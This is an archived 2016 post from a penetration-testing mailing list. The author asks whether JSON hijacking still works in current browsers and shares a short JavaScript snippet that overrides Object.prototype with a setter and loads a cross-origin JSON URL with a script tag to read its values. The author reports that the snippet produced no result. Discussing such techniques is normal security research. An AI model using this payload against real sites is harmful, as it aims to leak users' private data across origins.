Penetration Testing mailing list archives
JSON Hijacking
From: Ricardo Iramar dos Santos <riramar () gmail com>
Date: Wed, 24 Feb 2016 18:22:16 -0300
Hi All, Do you guys know if JSON Hijacking is still possible? It seems the method __defineSetter__ has been deprecated but I've seeing some post that it's still possible to override the constructor. I tried using the javascript below but no error on console either a alert popup. <script> Object.defineProperty(Object.prototype, 'id', { set:function(obj) { for(var i in obj) { alert(i + '=' + obj[i]); } } }); </script> <script src="https://blah.returning.json"></script> Thanks! Ricardo Iramar ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- JSON Hijacking Ricardo Iramar dos Santos (Feb 24)